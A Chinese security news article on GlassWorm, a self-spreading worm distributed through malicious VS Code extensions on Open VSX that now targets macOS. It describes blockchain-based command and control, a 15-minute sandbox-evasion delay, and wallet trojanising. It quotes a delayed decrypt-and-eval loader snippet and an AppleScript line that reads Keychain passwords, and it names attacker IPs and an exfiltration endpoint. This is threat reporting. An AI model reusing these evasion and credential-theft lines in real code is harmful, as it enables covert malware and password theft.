【安全圈】自传播恶意软件GlassWorm利用VS Code扩展攻击macOS用户

关键词

恶意软件

网络安全研究人员发现GlassWorm恶意软件新变种出现重大策略转变——从Windows系统转向攻击macOS平台。这款自传播蠕虫通过Open VSX市场上的恶意VS Code扩展传播，下载量已突破5万次。

第四代变种引入多项危险特性：加密载荷、硬件钱包木马化功能以及可绕过传统安全扫描工具的沙箱规避技术。自去年10月以来，该威胁组织已展现出极强的适应能力，历经四次迭代升级。

恶意扩展伪装与区块链C2架构

Open VSX市场上已标记三个可疑扩展：pro-svelte-extension、vsce-prettier-pro和full-access-catppuccin-pro-extension，这些扩展通过共享基础设施和加密密钥相互关联。

该恶意软件采用基于Solana区块链的命令与控制(C2)架构，使得传统封堵手段几乎失效。攻击者通过向区块链发布包含base64编码URL的交易备忘录，维持着无法通过传统域名封锁破坏的去中心化控制。研究人员溯源发现IP地址45.32.151.157在第三代攻击中同样被使用，证实威胁组织的延续性。

加密载荷与沙箱规避技术

第四代变种引入了精妙的时间延迟机制逃避自动化安全分析。恶意扩展安装后会精确等待15分钟才执行载荷——这个时间差至关重要，因为多数沙箱环境在5分钟后就会超时终止分析，使得恶意软件在自动化扫描期间表现完全正常。

代码中硬编码了9e5毫秒(即15分钟)的延迟值，用于触发AES-256-CBC加密载荷的解密执行：

setTimeout(() => {
  const decrypted = crypto.createDecipheriv('aes-256-cbc', key, iv);
  let payload = decrypted.update(encryptedData, 'base64', 'utf8');
  payload += decrypted.final('utf8');
  eval(payload);
}, 9e5);

加密载荷被嵌入主扩展文件的第64行，使用硬编码密钥和初始化向量进行加密，且三个恶意扩展的加密参数完全一致，证实为同一威胁组织所为。

macOS定向攻击与硬件钱包威胁

延迟期结束后，恶意软件会从Solana区块链获取当前C2端点并执行接收到的指令。针对macOS的载荷包含：

• 使用AppleScript实现隐蔽执行

• 采用LaunchAgents实现持久化（而非Windows注册表）

• 直接访问macOS钥匙串数据库获取存储的密码凭证：

set keychainPassword to do shell script "security find-generic-password -s 'password_service' -w"

该恶意软件还能将硬件钱包应用（Ledger Live和Trezor Suite）替换为木马版本。虽然2025年12月29日测试期间钱包替换功能尚未完全激活，但相关代码框架已构建完成，只待载荷上传。所有窃取数据会暂存在/tmp/ijewf/目录，经压缩后发送至45.32.150.251/p2p服务器供攻击者提取。

安全圈

网罗圈内热点 专注网络安全

实时资讯一手掌握！

好看你就分享 有用就点个赞

支持「安全圈」就点个三连吧！